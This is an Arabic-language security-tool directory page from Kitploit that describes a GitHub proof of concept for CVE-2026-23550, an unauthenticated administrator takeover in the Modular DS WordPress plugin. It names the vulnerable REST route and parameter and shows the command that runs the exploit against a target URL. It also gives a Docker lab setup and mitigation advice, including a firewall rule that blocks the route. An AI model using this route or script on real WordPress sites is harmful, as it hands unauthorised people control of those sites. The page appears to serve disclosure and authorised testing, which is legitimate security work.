Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23550-PoC — CVE-2026-23550 - إضافة ووردبريس Modular DS **وصول غير مصادق إلى لوحة التحكم** | Kitploit
أدوات/GitHubGitHub/thetorjancaptain/cve-2026-23550-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالمصادقة
GitHubthetorjancaptain/cve-2026-23550-poc

CVE-2026-23550-PoC

CVE-2026-23550 - إضافة ووردبريس Modular DS **وصول غير مصادق إلى لوحة التحكم**

عرض المستودع
1منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-23550-PoC

CVE-2026-23550 - إضافة Modular DS لووردبريس وصول غير مصادق عليه للوحة التحكم

Status CVSS Affected

إثبات المفهوم (PoC) يوضح CVE-2026-23550 - استيلاء حرج غير مصادق عليه على حساب المدير في إضافة Modular DS لووردبريس (الإصدارات ≤2.5.1). يتم استغلالها بنشاط في البرية.

PoC Flow

ملخص الهجوم: توجيه معيب لواجهة REST API في /api/modular-connector/login يتجاوز مصادقة ووردبريس عندما يكون ، مما يمنح ملفات تعريف ارتباط جلسة مدير غير مصادق عليها.

origin=mo

🚀 عرض سريع - إذا كان لديك ووردبريس مُعد مسبقًا

root@kitploit:~
# PoC جاهز للإنتاج
./CVE-2026-23550-PoC.sh http://target.com

المخرجات:

root@kitploit:~
[+] CVE-2026-23550 Modular Connector Exploit Test
[+] VULNERABLE: Admin session cookie issued

ملاحظة فنية:

نقطة نهاية REST المتأثرة يمكن الوصول إليها حصريًا عبر آلية ?rest_route=؛ قد يكون الوصول المباشر عبر /wp-json/ غير متاح. تسمح الثغرة بالوصول غير المصادق عليه دون الحاجة إلى بيانات اعتماد أو التحقق من nonce. يُعد إصدار ملف تعريف ارتباط جلسة مدير ووردبريس بنجاح تأكيدًا على الاستغلال. لا ينفذ إثبات المفهوم هذا أي إجراءات إدارية. تم استخدام إصدار Modular DS 2.5.0 أثناء الاختبار.


⚙️ خطوات إعادة الإنتاج:

الخطوة 1: مجلد المختبر

root@kitploit:~
mkdir -p ~/Desktop/CVE-2026-23550/cve-poc-wp
cd ~/Desktop/CVE-2026-23550/cve-poc-wp

الخطوة 2: Docker Compose

root@kitploit:~
version: "3.9"

services:
  db:
    image: mysql:8.0
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: rootpass
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wpuser
      MYSQL_PASSWORD: wppass
    volumes:
      - db_data:/var/lib/mysql

  wordpress:
    image: wordpress:6.4.3-php8.2-apache
    depends_on:
      - db
    ports:
      - "8080:80"
    restart: always
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_USER: wpuser
      WORDPRESS_DB_PASSWORD: wppass
      WORDPRESS_DB_NAME: wordpress
    volumes:
      - wp_data:/var/www/html

volumes:
  db_data:
  wp_data:

الخطوة 3: النشر

root@kitploit:~
docker compose up -d
docker compose logs -f db

انتظر حتى: "ready for connections"

الخطوة 4: تثبيت ووردبريس

  • الرابط: http://localhost:8080
  • مستخدم المدير: admin
  • كلمة المرور: admin123
  • عنوان الموقع: أي شيء

الخطوة 5: التحقق من REST (مهم)

root@kitploit:~
curl http://localhost:8080/?rest_route=/

المتوقع:

root@kitploit:~
{
  "name": "...",
  "namespaces": [...]
}

إذا فشل هذا → توقف، البيئة معطلة.

الخطوة 6: تثبيت الإضافة الضعيفة

root@kitploit:~
wget https://downloads.wordpress.org/plugin/modular-connector.2.5.0.zip
unzip modular-connector.2.5.0.zip

WORDPRESS_ID=$(docker compose ps -q wordpress)
docker cp modular-connector "$WORDPRESS_ID":/var/www/html/wp-content/plugins/

docker exec "$WORDPRESS_ID" chown -R www-data:www-data \
  /var/www/html/wp-content/plugins/modular-connector

الخطوة 7: تفعيل الإضافة

  • http://localhost:8080/wp-admin/plugins.php
  • فعّل Modular Connector
  • تجاهل مطالبات الإعداد

الخطوة 8: الاستغلال

root@kitploit:~
chmod +x CVE-2026-23550-PoC.sh
./CVE-2026-23550-PoC.sh http://localhost:8080/

ملاحظة: إذا كنت تريد ملفات تعريف الارتباط في ملف نصي فقم بإزالة "rm -f "$COOKIE_JAR"" من ملف poc.sh.

🛡️ التخفيف

  • فوري: قم بتعطيل إضافة Modular DS
  • التصحيح: قم بالترقية إلى 2.5.2+
  • التدقيق: تحقق من وجود مستخدمين مديرين غير مصرح لهم
  • جدار الحماية للتطبيقات (WAF): احظر ?rest_route=/api/modular-connector/login

📄 الترخيص

رخصة MIT - لأغراض البحث الأمني والاختبارات المخولة فقط. ليست للاستخدام الخبيث. افصح عن الثغرات بمسؤولية.

🚨 إشعار قانوني

إثبات المفهوم هذا مخصص للاختبارات الأمنية المخولة فقط. الاستخدام غير المصرح به ضد أنظمة الإنتاج غير قانوني. أبلغ عن النتائج إلى مطوري الإضافة.

تنزيل الأداة